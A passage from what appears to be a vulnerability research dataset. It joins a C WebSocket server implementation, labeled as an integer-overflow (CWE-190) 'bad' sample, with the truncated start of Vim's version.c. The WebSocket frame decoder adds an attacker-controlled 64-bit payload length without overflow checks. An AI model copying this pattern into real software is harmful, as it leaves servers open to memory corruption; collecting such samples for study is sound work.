char *tmp = strdup(protocol_list);
char *pch = strtok(tmp, ", ");
while (pch != NULL) {
if (strcmp(pch, protocol) == 0) {
free(tmp);
return true;
}
pch = strtok(NULL, ", ");
}
free(tmp);
return false;
}
static bool is_good_origin(const char *origin, const char *require)
{
size_t origin_len = strlen(origin);
size_t require_len = strlen(require);
if (origin_len < require_len)
return false;
if (memcmp(origin + (origin_len - require_len), require, require_len) != 0)
return false;
return true;
}
static int on_http_message_complete(http_parser* parser)
{
struct clt_info *info = parser->data;
ws_svr *svr = ws_svr_from_ses(info->ses);
info->request->version_major = parser->http_major;
info->request->version_minor = parser->http_minor;
info->request->method = parser->method;
dict_entry *entry;
dict_iterator *iter = dict_get_iterator(info->request->headers);
while ((entry = dict_next(iter)) != NULL) {
log_trace("Header: %s: %s", (char *)entry->key, (char *)entry->val);
}
dict_release_iterator(iter);
if (info->request->method != HTTP_GET)
goto error;
if (http_request_get_header(info->request, "Host") == NULL)
goto error;
double version = info->request->version_major + info->request->version_minor * 0.1;
if (version < 1.1)
goto error;
const char *upgrade = http_request_get_header(info->request, "Upgrade");
if (upgrade == NULL || strcasecmp(upgrade, "websocket") != 0)
goto error;
const char *connection = http_request_get_header(info->request, "Connection");
if (connection == NULL)
goto error;
else {
bool found_upgrade = false;
int count;
sds *tokens = sdssplitlen(connection, strlen(connection), ",", 1, &count);
if (tokens == NULL)
goto error;
for (int i = 0; i < count; i++) {
sds token = tokens[i];
sdstrim(token, " ");
if (strcasecmp(token, "Upgrade") == 0) {
found_upgrade = true;
break;
}
}
sdsfreesplitres(tokens, count);
if (!found_upgrade)
goto error;
}
const char *ws_version = http_request_get_header(info->request, "Sec-WebSocket-Version");
if (ws_version == NULL || strcmp(ws_version, "13") != 0)
goto error;
const char *ws_key = http_request_get_header(info->request, "Sec-WebSocket-Key");
if (ws_key == NULL)
goto error;
const char *protocol_list = http_request_get_header(info->request, "Sec-WebSocket-Protocol");
if (protocol_list && !is_good_protocol(protocol_list, svr->protocol))
goto error;
if (strlen(svr->origin) > 0) {
const char *origin = http_request_get_header(info->request, "Origin");
if (origin == NULL || !is_good_origin(origin, svr->origin))
goto error;
}
if (svr->type.on_privdata_alloc) {
info->privdata = svr->type.on_privdata_alloc(svr);
if (info->privdata == NULL)
goto error;
}
info->upgrade = true;
info->remote = sdsnew(http_get_remote_ip(info->ses, info->request));
info->url = sdsnew(info->request->url);
if (svr->type.on_upgrade) {
svr->type.on_upgrade(info->ses, info->remote);
}
if (protocol_list) {
send_hand_shake_reply(info->ses, svr->protocol, ws_key);
} else {
send_hand_shake_reply(info->ses, NULL, ws_key);
}
return 0;
error:
ws_svr_close_clt(ws_svr_from_ses(info->ses), info->ses);
return -1;
}
static int on_http_url(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
if (info->request->url)
sdsfree(info->request->url);
info->request->url = sdsnewlen(at, length);
return 0;
}
static int on_http_header_field(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
info->field_set = true;
if (info->field == NULL) {
info->field = sdsnewlen(at, length);
} else {
info->field = sdscpylen(info->field, at, length);
}
return 0;
}
static int on_http_header_value(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
info->value_set = true;
if (info->value == NULL) {
info->value = sdsnewlen(at, length);
} else {
info->value = sdscpylen(info->value, at, length);
}
if (info->field_set && info->value_set) {
http_request_set_header(info->request, info->field, info->value);
info->field_set = false;
info->value_set = false;
}
return 0;
}
static int on_http_body(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
info->request->body = sdsnewlen(at, length);
return 0;
}
static bool is_good_opcode(uint8_t opcode)
{
static uint8_t good_list[] = { 0x0, 0x1, 0x2, 0x8, 0x9, 0xa };
for (size_t i = 0; i < sizeof(good_list); ++i) {
if (opcode == good_list[i])
return true;
}
return false;
}
static int decode_pkg(nw_ses *ses, void *data, size_t max)
{
struct clt_info *info = ses->privdata;
if (!info->upgrade) {
return max;
}
if (max < 2)
return 0;
uint8_t *p = data;
size_t pkg_size = 0;
memset(&info->frame, 0, sizeof(info->frame));
info->frame.fin = p[0] & 0x80;
info->frame.opcode = p[0] & 0x0f;
if (!is_good_opcode(info->frame.opcode))
return -1;
uint8_t mask = p[1] & 0x80;
if (mask == 0)
return -1;
uint8_t len = p[1] & 0x7f;
if (len < 126) {
pkg_size = 2;
info->frame.payload_len = len;
} else if (len == 126) {
pkg_size = 2 + 2;
if (max < pkg_size)
return 0;
info->frame.payload_len = be16toh(*(uint16_t *)(p + 2));
} else if (len == 127) {
pkg_size = 2 + 8;
if (max < pkg_size)
return 0;
info->frame.payload_len = be64toh(*(uint64_t *)(p + 2));
}
uint8_t masks[4];
memcpy(masks, p + pkg_size, sizeof(masks));
pkg_size += sizeof(masks);
info->frame.payload = p + pkg_size;
pkg_size += info->frame.payload_len;
if (max < pkg_size)
return 0;
p = info->frame.payload;
for (size_t i = 0; i < info->frame.payload_len; ++i) {
p[i] = p[i] ^ masks[i & 3];
}
return pkg_size;
}
static void on_error_msg(nw_ses *ses, const char *msg)
{
log_error("peer: %s: %s", nw_sock_human_addr(&ses->peer_addr), msg);
}
static void on_new_connection(nw_ses *ses)
{
log_trace("new connection from: %s", nw_sock_human_addr(&ses->peer_addr));
struct clt_info *info = ses->privdata;
memset(info, 0, sizeof(struct clt_info));
info->ses = ses;
info->last_activity = current_timestamp();
http_parser_init(&info->parser, HTTP_REQUEST);
info->parser.data = info;
}
static void on_connection_close(nw_ses *ses)
{
log_trace("connection %s close", nw_sock_human_addr(&ses->peer_addr));
struct clt_info *info = ses->privdata;
struct ws_svr *svr = ws_svr_from_ses(ses);
if (info->upgrade) {
if (svr->type.on_close) {
svr->type.on_close(ses, info->remote);
}
if (svr->type.on_privdata_free) {
svr->type.on_privdata_free(svr, info->privdata);
}
}
}
static void *on_privdata_alloc(void *svr)
{
ws_svr *w_svr = ((nw_svr *)svr)->privdata;
return nw_cache_alloc(w_svr->privdata_cache);
}
static void on_privdata_free(void *svr, void *privdata)
{
struct clt_info *info = privdata;
if (info->field) {
sdsfree(info->field);
}
if (info->value) {
sdsfree(info->value);
}
if (info->remote) {
sdsfree(info->remote);
}
if (info->url) {
sdsfree(info->url);
}
if (info->message) {
sdsfree(info->message);
}
if (info->request) {
http_request_release(info->request);
}
ws_svr *w_svr = ((nw_svr *)svr)->privdata;
nw_cache_free(w_svr->privdata_cache, privdata);
}
static int send_reply(nw_ses *ses, uint8_t opcode, void *payload, size_t payload_len)
{
if (payload == NULL)
payload_len = 0;
static void *buf;
static size_t buf_size = 1024;
if (buf == NULL) {
buf = malloc(1024);
if (buf == NULL)
return -1;
}
size_t require_len = 10 + payload_len;
if (buf_size < require_len) {
void *new = realloc(buf, require_len);
if (new == NULL)
return -1;
buf = new;
buf_size = require_len;
}
size_t pkg_len = 0;
uint8_t *p = buf;
p[0] = 0;
p[0] |= 0x1 << 7;
p[0] |= opcode;
p[1] = 0;
if (payload_len < 126) {
uint8_t len = payload_len;
p[1] |= len;
pkg_len = 2;
} else if (payload_len <= 0xffff) {
p[1] |= 126;
uint16_t len = htobe16((uint16_t)payload_len);
memcpy(p + 2, &len, sizeof(len));
pkg_len = 2 + sizeof(len);
} else {
p[1] |= 127;
uint64_t len = htobe64(payload_len);
memcpy(p + 2, &len, sizeof(len));
pkg_len = 2 + sizeof(len);
}
if (payload) {
memcpy(p + pkg_len, payload, payload_len);
pkg_len += payload_len;
}
return nw_ses_send(ses, buf, pkg_len);
}
static int send_pong_message(nw_ses *ses)
{
return send_reply(ses, 0xa, NULL, 0);
}
static void on_recv_pkg(nw_ses *ses, void *data, size_t size)
{
struct clt_info *info = ses->privdata;
ws_svr *svr = ws_svr_from_ses(ses);
info->last_activity = current_timestamp();
if (!info->upgrade) {
size_t nparsed = http_parser_execute(&info->parser, &svr->settings, data, size);
if (!info->parser.upgrade && nparsed != size) {
log_error("peer: %s http parse error: %s (%s)", nw_sock_human_addr(&ses->peer_addr),
http_errno_description(HTTP_PARSER_ERRNO(&info->parser)),
http_errno_name(HTTP_PARSER_ERRNO(&info->parser)));
nw_svr_close_clt(svr->raw_svr, ses);
}
return;
}
switch (info->frame.opcode) {
case 0x8:
nw_svr_close_clt(svr->raw_svr, ses);
return;
case 0x9:
send_pong_message(ses);
return;
case 0xa:
return;
}
if (info->message == NULL)
info->message = sdsempty();
info->message = sdscatlen(info->message, info->frame.payload, info->frame.payload_len);
if (info->frame.fin) {
int ret = svr->type.on_message(ses, info->remote, info->url, info->message, sdslen(info->message));
if (ses->id != 0) {
if (ret < 0) {
nw_svr_close_clt(svr->raw_svr, ses);
} else {
sdsfree(info->message);
info->message = NULL;
}
}
}
}
static void on_timer(nw_timer *timer, void *privdata)
{
ws_svr *svr = privdata;
double now = current_timestamp();
nw_ses *curr = svr->raw_svr->clt_list_head;
nw_ses *next;
while (curr) {
next = curr->next;
struct clt_info *info = curr->privdata;
if (now - info->last_activity > svr->keep_alive) {
log_error("peer: %s: last_activity: %f, idle too long", nw_sock_human_addr(&curr->peer_addr), info->last_activity);
nw_svr_close_clt(svr->raw_svr, curr);
}
curr = next;
}
}
ws_svr *ws_svr_create(ws_svr_cfg *cfg, ws_svr_type *type)
{
if (type->on_message == NULL)
return NULL;
if (type->on_privdata_alloc && !type->on_privdata_free)
return NULL;
ws_svr *svr = malloc(sizeof(ws_svr));
memset(svr, 0, sizeof(ws_svr));
nw_svr_cfg raw_cfg;
memset(&raw_cfg, 0, sizeof(raw_cfg));
raw_cfg.bind_count = cfg->bind_count;
raw_cfg.bind_arr = cfg->bind_arr;
raw_cfg.max_pkg_size = cfg->max_pkg_size;
raw_cfg.buf_limit = cfg->buf_limit;
raw_cfg.read_mem = cfg->read_mem;
raw_cfg.write_mem = cfg->write_mem;
nw_svr_type st;
memset(&st, 0, sizeof(st));
st.decode_pkg = decode_pkg;
st.on_error_msg = on_error_msg;
st.on_new_connection = on_new_connection;
st.on_connection_close = on_connection_close;
st.on_recv_pkg = on_recv_pkg;
st.on_privdata_alloc = on_privdata_alloc;
st.on_privdata_free = on_privdata_free;
svr->raw_svr = nw_svr_create(&raw_cfg, &st, svr);
if (svr->raw_svr == NULL) {
free(svr);
return NULL;
}
memset(&svr->settings, 0, sizeof(http_parser_settings));
svr->settings.on_message_begin = on_http_message_begin;
svr->settings.on_url = on_http_url;
svr->settings.on_header_field = on_http_header_field;
svr->settings.on_header_value = on_http_header_value;
svr->settings.on_body = on_http_body;
svr->settings.on_message_complete = on_http_message_complete;
svr->keep_alive = cfg->keep_alive;
svr->protocol = strdup(cfg->protocol);
svr->origin = strdup(cfg->origin);
svr->privdata_cache = nw_cache_create(sizeof(struct clt_info));
memcpy(&svr->type, type, sizeof(ws_svr_type));
if (cfg->keep_alive > 0) {
nw_timer_set(&svr->timer, 60, true, on_timer, svr);
nw_timer_start(&svr->timer);
}
return svr;
}
int ws_svr_start(ws_svr *svr)
{
int ret = nw_svr_start(svr->raw_svr);
if (ret < 0)
return ret;
return 0;
}
int ws_svr_stop(ws_svr *svr)
{
int ret = nw_svr_stop(svr->raw_svr);
if (ret < 0)
return ret;
return 0;
}
ws_svr *ws_svr_from_ses(nw_ses *ses)
{
return ((nw_svr *)ses->svr)->privdata;
}
void *ws_ses_privdata(nw_ses *ses)
{
struct clt_info *info = ses->privdata;
return info->privdata;
}
int ws_send_text(nw_ses *ses, char *message)
{
return send_reply(ses, 0x1, message, strlen(message));
}
int ws_send_binary(nw_ses *ses, void *data, size_t size)
{
return send_reply(ses, 0x2, data, size);
}
static int broadcast_message(ws_svr *svr, uint8_t opcode, void *data, size_t size)
{
nw_ses *curr = svr->raw_svr->clt_list_head;
while (curr) {
nw_ses *next = curr->next;
struct clt_info *info = curr->privdata;
if (info->upgrade) {
int ret = send_reply(curr, opcode, data, size);
if (ret < 0)
return ret;
}
curr = next;
}
return 0;
}
int ws_svr_broadcast_text(ws_svr *svr, char *message)
{
return broadcast_message(svr, 0x1, message, strlen(message));
}
int ws_svr_broadcast_binary(ws_svr *svr, void *data, size_t size)
{
return broadcast_message(svr, 0x2, data, size);
}
void ws_svr_close_clt(ws_svr *svr, nw_ses *ses)
{
nw_svr_close_clt(svr->raw_svr, ses);
}
void ws_svr_release(ws_svr *svr)
{
nw_svr_release(svr->raw_svr);
nw_timer_stop(&svr->timer);
nw_cache_release(svr->privdata_cache);
free(svr->protocol);
free(svr);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_400_3 |
crossvul-cpp_data_bad_3179_1 | /* vi:set ts=8 sts=4 sw=4 noet:
*
* VIM - Vi IMproved by Bram Moolenaar
*
* Do ":help uganda" in Vim to read copying and usage conditions.
* Do ":help credits" in Vim to see a list of people who contributed.
* See README.txt for an overview of the Vim source code.
*/
#include "vim.h"
#ifdef AMIGA
# include <time.h> /* for time() */
#endif
/*
* Vim originated from Stevie version 3.6 (Fish disk 217) by GRWalter (Fred)
* It has been changed beyond recognition since then.
*
* Differences between version 7.4 and 8.x can be found with ":help version8".
* Differences between version 6.4 and 7.x can be found with ":help version7".
* Differences between version 5.8 and 6.x can be found with ":help version6".
* Differences between version 4.x and 5.x can be found with ":help version5".
* Differences between version 3.0 and 4.x can be found with ":help version4".
* All the remarks about older versions have been removed, they are not very
* interesting.
*/
#include "version.h"
char *Version = VIM_VERSION_SHORT;
static char *mediumVersion = VIM_VERSION_MEDIUM;
#if defined(HAVE_DATE_TIME) || defined(PROTO)
# if (defined(VMS) && defined(VAXC)) || defined(PROTO)
char longVersion[sizeof(VIM_VERSION_LONG_DATE) + sizeof(__DATE__)
+ sizeof(__TIME__) + 3];
void
make_version(void)
{
/*
* Construct the long version string. Necessary because
* VAX C can't catenate strings in the preprocessor.
*/
strcpy(longVersion, VIM_VERSION_LONG_DATE);
strcat(longVersion, __DATE__);
strcat(longVersion, " ");
strcat(longVersion, __TIME__);
strcat(longVersion, ")");
}
# else
char *longVersion = VIM_VERSION_LONG_DATE __DATE__ " " __TIME__ ")";
# endif
#else
char *longVersion = VIM_VERSION_LONG;
#endif
static void list_features(void);
static void version_msg(char *s);
static char *(features[]) =
{
#ifdef HAVE_ACL
"+acl",
#else
"-acl",
#endif
#ifdef AMIGA /* only for Amiga systems */
# ifdef FEAT_ARP
"+ARP",
# else
"-ARP",
# endif
#endif
#ifdef FEAT_ARABIC
"+arabic",
#else
"-arabic",
#endif
#ifdef FEAT_AUTOCMD
"+autocmd",
#else
"-autocmd",
#endif
#ifdef FEAT_BEVAL
"+balloon_eval",
#else
"-balloon_eval",
#endif
#ifdef FEAT_BROWSE
"+browse",
#else
"-browse",
#endif
#ifdef NO_BUILTIN_TCAPS
"-builtin_terms",
#endif
#ifdef SOME_BUILTIN_TCAPS
"+builtin_terms",
#endif
#ifdef ALL_BUILTIN_TCAPS
"++builtin_terms",
#endif
#ifdef FEAT_BYTEOFF
"+byte_offset",
#else
"-byte_offset",
#endif
#ifdef FEAT_JOB_CHANNEL
"+channel",
#else
"-channel",
#endif
#ifdef FEAT_CINDENT
"+cindent",
#else
"-cindent",
#endif
#ifdef FEAT_CLIENTSERVER
"+clientserver",
#else
"-clientserver",
#endif
#ifdef FEAT_CLIPBOARD
"+clipboard",
#else
"-clipboard",
#endif
#ifdef FEAT_CMDL_COMPL
"+cmdline_compl",
#else
"-cmdline_compl",
#endif
#ifdef FEAT_CMDHIST
"+cmdline_hist",
#else
"-cmdline_hist",
#endif
#ifdef FEAT_CMDL_INFO
"+cmdline_info",
#else
"-cmdline_info",
#endif
#ifdef FEAT_COMMENTS
"+comments",
#else
"-comments",
#endif
#ifdef FEAT_CONCEAL
"+conceal",
#else
"-conceal",
#endif
#ifdef FEAT_CRYPT
"+cryptv",
#else
"-cryptv",
#endif
#ifdef FEAT_CSCOPE
"+cscope",
#else
"-cscope",
#endif
#ifdef FEAT_CURSORBIND
"+cursorbind",
#else
"-cursorbind",
#endif
#ifdef CURSOR_SHAPE
"+cursorshape",
#else
"-cursorshape",
#endif
#if defined(FEAT_CON_DIALOG) && defined(FEAT_GUI_DIALOG)
"+dialog_con_gui",
#else
# if defined(FEAT_CON_DIALOG)
"+dialog_con",
# else
# if defined(FEAT_GUI_DIALOG)
"+dialog_gui",
# else
"-dialog",
# endif
# endif
#endif
#ifdef FEAT_DIFF
"+diff",
#else
"-diff",
#endif
#ifdef FEAT_DIGRAPHS
"+digraphs",
#else
"-digraphs",
#endif
#ifdef FEAT_GUI_W32
# ifdef FEAT_DIRECTX
"+directx",
# else
"-directx",
# endif
#endif
#ifdef FEAT_DND
"+dnd",
#else
"-dnd",
#endif
#ifdef EBCDIC
"+ebcdic",
#else
"-ebcdic",
#endif
#ifdef FEAT_EMACS_TAGS
"+emacs_tags",
#else
"-emacs_tags",
#endif
#ifdef FEAT_EVAL
"+eval",
#else
"-eval",
#endif
"+ex_extra",
#ifdef FEAT_SEARCH_EXTRA
"+extra_search",
#else
"-extra_search",
#endif
#ifdef FEAT_FKMAP
"+farsi",
#else
"-farsi",
#endif
#ifdef FEAT_SEARCHPATH
"+file_in_path",
#else
"-file_in_path",
#endif
#ifdef FEAT_FIND_ID
"+find_in_path",
#else
"-find_in_path",
#endif
#ifdef FEAT_FLOAT
"+float",
#else
"-float",
#endif
#ifdef FEAT_FOLDING
"+folding",
#else
"-folding",
#endif
#ifdef FEAT_FOOTER
"+footer",
#else
"-footer",
#endif
/* only interesting on Unix systems */
#if !defined(USE_SYSTEM) && defined(UNIX)
"+fork()",
#endif
#ifdef FEAT_GETTEXT
# ifdef DYNAMIC_GETTEXT
"+gettext/dyn",
# else
"+gettext",
# endif
#else
"-gettext",
#endif
#ifdef FEAT_HANGULIN
"+hangul_input",
#else
"-hangul_input",
#endif
#if (defined(HAVE_ICONV_H) && defined(USE_ICONV)) || defined(DYNAMIC_ICONV)
# ifdef DYNAMIC_ICONV
"+iconv/dyn",
# else
"+iconv",
# endif
#else
"-iconv",
#endif
#ifdef FEAT_INS_EXPAND
"+insert_expand",
#else
"-insert_expand",
#endif
#ifdef FEAT_JOB_CHANNEL
"+job",
#else
"-job",
#endif
#ifdef FEAT_JUMPLIST
"+jumplist",
#else
"-jumplist",
#endif
#ifdef FEAT_KEYMAP
"+keymap",
#else
"-keymap",
#endif
#ifdef FEAT_EVAL
"+lambda",
#else
"-lambda",
#endif
#ifdef FEAT_LANGMAP
"+langmap",
#else
"-langmap",
#endif
#ifdef FEAT_LIBCALL
"+libcall",
#else
"-libcall",
#endif
#ifdef FEAT_LINEBREAK
"+linebreak",
#else
"-linebreak",
#endif
#ifdef FEAT_LISP
"+lispindent",
#else
"-lispindent",
#endif
#ifdef FEAT_LISTCMDS
"+listcmds",
#else
"-listcmds",
#endif
#ifdef FEAT_LOCALMAP
"+localmap",
#else
"-localmap",
#endif
#ifdef FEAT_LUA
# ifdef DYNAMIC_LUA
"+lua/dyn",
# else
"+lua",
# endif
#else
"-lua",
#endif
#ifdef FEAT_MENU
"+menu",
#else
"-menu",
#endif
#ifdef FEAT_SESSION
"+mksession",
#else
"-mksession",
#endif
#ifdef FEAT_MODIFY_FNAME
"+modify_fname",
#else
"-modify_fname",
#endif
#ifdef FEAT_MOUSE
"+mouse",
# ifdef FEAT_MOUSESHAPE
"+mouseshape",
# else
"-mouseshape",
# endif
# else
"-mouse",
#endif
#if defined(UNIX) || defined(VMS)
# ifdef FEAT_MOUSE_DEC
"+mouse_dec",
# else
"-mouse_dec",
# endif
# ifdef FEAT_MOUSE_GPM
"+mouse_gpm",
# else
"-mouse_gpm",
# endif
# ifdef FEAT_MOUSE_JSB
"+mouse_jsbterm",
# else
"-mouse_jsbterm",
# endif
# ifdef FEAT_MOUSE_NET
"+mouse_netterm",
# else
"-mouse_netterm",
# endif
#endif
#ifdef __QNX__
# ifdef FEAT_MOUSE_PTERM
"+mouse_pterm",
# else
"-mouse_pterm",
# endif
#endif
#if defined(UNIX) || defined(VMS)
# ifdef FEAT_MOUSE_SGR
"+mouse_sgr",
# else
"-mouse_sgr",
# endif
# ifdef FEAT_SYSMOUSE
"+mouse_sysmouse",
# else
"-mouse_sysmouse",
# endif
# ifdef FEAT_MOUSE_URXVT
"+mouse_urxvt",
# else
"-mouse_urxvt",
# endif
# ifdef FEAT_MOUSE_XTERM
"+mouse_xterm",
# else
"-mouse_xterm",
# endif
#endif
#ifdef FEAT_MBYTE_IME
# ifdef DYNAMIC_IME
"+multi_byte_ime/dyn",
# else
"+multi_byte_ime",
# endif
#else
# ifdef FEAT_MBYTE
"+multi_byte",
# else
"-multi_byte",
# endif
#endif
#ifdef FEAT_MULTI_LANG
"+multi_lang",
#else
"-multi_lang",
#endif
#ifdef FEAT_MZSCHEME
# ifdef DYNAMIC_MZSCHEME
"+mzscheme/dyn",
# else
"+mzscheme",
# endif
#else
"-mzscheme",
#endif
#ifdef FEAT_NETBEANS_INTG
"+netbeans_intg",
#else
"-netbeans_intg",
#endif
#ifdef FEAT_NUM64
"+num64",
#else
"-num64",
#endif
#ifdef FEAT_GUI_W32
# ifdef FEAT_OLE
"+ole",
# else
"-ole",
# endif
#endif
"+packages",
#ifdef FEAT_PATH_EXTRA
"+path_extra",
#else
"-path_extra",
#endif
#ifdef FEAT_PERL
# ifdef DYNAMIC_PERL
"+perl/dyn",
# else
"+perl",
# endif
#else
"-perl",
#endif
#ifdef FEAT_PERSISTENT_UNDO
"+persistent_undo",
#else
"-persistent_undo",
#endif
#ifdef FEAT_PRINTER
# ifdef FEAT_POSTSCRIPT
"+postscript",
# else
"-postscript",
# endif
"+printer",
#else
"-printer",
#endif
#ifdef FEAT_PROFILE
"+profile",
#else
"-profile",
#endif
#ifdef FEAT_PYTHON
# ifdef DYNAMIC_PYTHON
"+python/dyn",
# else
"+python",
# endif
#else
"-python",
#endif
#ifdef FEAT_PYTHON3
# ifdef DYNAMIC_PYTHON3
"+python3/dyn",
# else
"+python3",
# endif
#else
"-python3",
#endif
#ifdef FEAT_QUICKFIX
"+quickfix",
#else
"-quickfix",
#endif
#ifdef FEAT_RELTIME
"+reltime",
#else
"-reltime",
#endif
#ifdef FEAT_RIGHTLEFT
"+rightleft",
#else
"-rightleft",
#endif
#ifdef FEAT_RUBY
# ifdef DYNAMIC_RUBY
"+ruby/dyn",
# else
"+ruby",
# endif
#else
"-ruby",
#endif
#ifdef FEAT_SCROLLBIND
"+scrollbind",
#else
"-scrollbind",
#endif
#ifdef FEAT_SIGNS
"+signs",
#else
"-signs",
#endif
#ifdef FEAT_SMARTINDENT
"+smartindent",
#else
"-smartindent",
#endif
#ifdef STARTUPTIME
"+startuptime",
#else
"-startuptime",
#endif
#ifdef FEAT_STL_OPT
"+statusline",
#else
"-statusline",
#endif
#ifdef FEAT_SUN_WORKSHOP
"+sun_workshop",
#else
"-sun_workshop",
#endif
#ifdef FEAT_SYN_HL
"+syntax",
#else
"-syntax",
#endif
/* only interesting on Unix systems */
#if defined(USE_SYSTEM) && defined(UNIX)
"+system()",
#endif
#ifdef FEAT_TAG_BINS
"+tag_binary",
#else
"-tag_binary",
#endif
#ifdef FEAT_TAG_OLDSTATIC
"+tag_old_static",
#else
"-tag_old_static",
#endif
#ifdef FEAT_TAG_ANYWHITE
"+tag_any_white",
#else
"-tag_any_white",
#endif
#ifdef FEAT_TCL
# ifdef DYNAMIC_TCL
"+tcl/dyn",
# else
"+tcl",
# endif
#else
"-tcl",
#endif
#ifdef FEAT_TERMGUICOLORS
"+termguicolors",
#else
"-termguicolors",
#endif
#if defined(UNIX)
/* only Unix can have terminfo instead of termcap */
# ifdef TERMINFO
"+terminfo",
# else
"-terminfo",
# endif
#else /* unix always includes termcap support */
# ifdef HAVE_TGETENT
"+tgetent",
# else
"-tgetent",
# endif
#endif
#ifdef FEAT_TERMRESPONSE
"+termresponse",
#else
"-termresponse",
#endif
#ifdef FEAT_TEXTOBJ
"+textobjects",
#else
"-textobjects",
#endif
#ifdef FEAT_TIMERS
"+timers",
#else
"-timers",
#endif
#ifdef FEAT_TITLE
"+title",
#else
"-title",
#endif
#ifdef FEAT_TOOLBAR
"+toolbar",
#else
"-toolbar",
#endif
#ifdef FEAT_USR_CMDS
"+user_commands",
#else
"-user_commands",
#endif
#ifdef FEAT_WINDOWS
"+vertsplit",
#else
"-vertsplit",
#endif
#ifdef FEAT_VIRTUALEDIT
"+virtualedit",
#else
"-virtualedit",
#endif
"+visual",
#ifdef FEAT_VISUALEXTRA
"+visualextra",
#else
"-visualextra",
#endif
#ifdef FEAT_VIMINFO
"+viminfo",
#else
"-viminfo",
#endif
#ifdef FEAT_VREPLACE
"+vreplace",
#else
"-vreplace",
#endif
#ifdef FEAT_WILDIGN
"+wildignore",
#else
"-wildignore",
#endif
#ifdef FEAT_WILDMENU
"+wildmenu",
#else
"-wildmenu",
#endif
#ifdef FEAT_WINDOWS
"+windows",
#else
"-windows",
#endif
#ifdef FEAT_WRITEBACKUP
"+writebackup",
#else
"-writebackup",
#endif
#if defined(UNIX) || defined(VMS)
# ifdef FEAT_X11
"+X11",
# else
"-X11",
# endif
#endif
#ifdef FEAT_XFONTSET
"+xfontset",
#else
"-xfontset",
#endif
#ifdef FEAT_XIM
"+xim",
#else
"-xim",
#endif
#ifdef WIN3264
# ifdef FEAT_XPM_W32
"+xpm_w32",
# else
"-xpm_w32",
# endif
#else
# ifdef HAVE_XPM
"+xpm",
# else
"-xpm",
# endif
#endif
#if defined(UNIX) || defined(VMS)
# ifdef USE_XSMP_INTERACT
"+xsmp_interact",
# else
# ifdef USE_XSMP
"+xsmp",
# else
"-xsmp",
# endif
# endif
# ifdef FEAT_XCLIPBOARD
"+xterm_clipboard",
# else
"-xterm_clipboard",
# endif
#endif
#ifdef FEAT_XTERM_SAVE
"+xterm_save",
#else
"-xterm_save",
#endif
NULL
};
static int included_patches[] =
{ /* Add new patch number below this line */
/**/
377,
/**/
376,
/**/
375,
/**/
374,
/**/
373,
/**/
372,
/**/
371,
/**/
370,
/**/
369,
/**/
368,
/**/
367,
/**/
366,
/**/
365,
/**/
364,
/**/
363,
/**/
362,
/**/
361,
/**/
360,
/**/
359,
/**/
358,
/**/
357,
/**/
356,
/**/
355,
/**/
354,
/**/
353,
/**/
352,
/**/
351,
/**/
350,
/**/
349,
/**/
348,
/**/
347,
/**/
346,
/**/
345,
/**/
344,
/**/
343,
/**/
342,
/**/
341,
/**/
340,
/**/
339,
/**/
338,
/**/
337,
/**/
336,
/**/
335,
/**/
334,
/**/
333,
/**/
332,
/**/
331,
/**/
330,
/**/
329,
/**/
328,
/**/
327,
/**/
326,
/**/
325,
/**/
324,
/**/
323,
/**/
322,
/**/
321,
/**/
320,
/**/
319,
/**/
318,
/**/
317,
/**/
316,
/**/
315,
/**/
314,
/**/
313,
/**/
312,
/**/
311,
/**/
310,
/**/
309,
/**/
308,
/**/
307,
/**/
306,
/**/
305,
/**/
304,
/**/
303,
/**/
302,
/**/
301,
/**/
300,
/**/
299,
/**/
298,
/**/
297,
/**/
296,
/**/
295,
/**/
294,
/**/
293,
/**/
292,
/**/
291,
/**/
290,
/**/
289,
/**/
288,
/**/
287,
/**/
286,
/**/
285,
/**/
284,
/**/
283,
/**/
282,
/**/
281,
/**/
280,
/**/
279,
/**/
278,
/**/
277,
/**/
276,
/**/
275,
/**/
274,
/**/
273,
/**/
272,
/**/
271,
/**/
270,
/**/
269,
/**/
268,
/**/
267,
/**/
266,
/**/
265,
/**/
264,
/**/
263,
/**/
262,
/**/
261,
/**/
260,
/**/
259,
/**/
258,
/**/
257,
/**/
256,
/**/
255,
/**/
254,
/**/
253,
/**/
252,
/**/
251,
/**/
250,
/**/
249,
/**/
248,
/**/
247,
/**/
246,
/**/
245,
/**/
244,
/**/
243,
/**/
242,
/**/
241,
/**/
240,
/**/
239,
/**/
238,
/**/
237,
/**/
236,
/**/
235,
/**/
234,
/**/
233,
/**/
232,
/**/
231,
/**/
230,
/**/
229,
/**/
228,
/**/
227,
/**/
226,
/**/
225,
/**/
224,
/**/
223,
/**/
222,
/**/
221,
/**/
220,
/**/
219,
/**/
218,
/**/
217,
/**/
216,
/**/
215,
/**/
214,
/**/
213,
/**/
212,
/**/
211,
/**/
210,
/**/
209,
/**/
208,
/**/
207,
/**/
206,
/**/
205,
/**/
204,
/**/
203,
/**/
202,
/**/
201,
/**/
200,
/**/
199,
/**/
198,
/**/
197,
/**/
196,
/**/
195,
/**/
194,
/**/
193,
/**/
192,
/**/
191,
/**/
190,
/**/
189,
/**/
188,
/**/
187,
/**/
186,
/**/
185,
/**/
184,
/**/
183,
/**/
182,
/**/
181,
/**/
180,
/**/
179,
/**/
178,
/**/
177,
/**/
176,
/**/
175,
/**/
174,
/**/
173,
/**/
172,
/**/
171,
/**/
170,
/**/
169,
/**/
168,
/**/
167,
/**/
166,
/**/
165,
/**/
164,
/**/
163,
/**/
162,
/**/
161,
/**/
160,
/**/
159,
/**/
158,
/**/
157,
/**/
156,
/**/
155,
/**/
154,
/**/
153,
/**/
152,
/**/
151,
/**/
150,
/**/
149,
/**/
148,
/**/
147,
/**/
146,
/**/
145,
/**/
144,
/**/
143,
/**/
142,
/**/
141,
/**/
140,
/**/
139,
/**/
138,
/**/
137,
/**/
136,
/**/
135,
/**/
134,
/**/
133,
/**/
132,
/**/
131,
/**/
130,
/**/
129,
/**/
128,
/**/
127,
/**/
126,
/**/
125,
/**/
124,
/**/
123,
/**/
122,
/**/
121,
/**/
120,
/**/
119,
/**/
118,
/**/
117,
/**/
116,
/**/
115,
/**/
114,
/**/
113,
/**/
112,
/**/
111,
/**/
110,
/**/
109,
/**/
108,
/**/
107,
/**/
106,
/**/
105,
/**/
104,
/**/
103,
/**/
102,
/**/
101,
/**/
100,
/**/
99,
/**/
98,
/**/
97,
/**/
96,
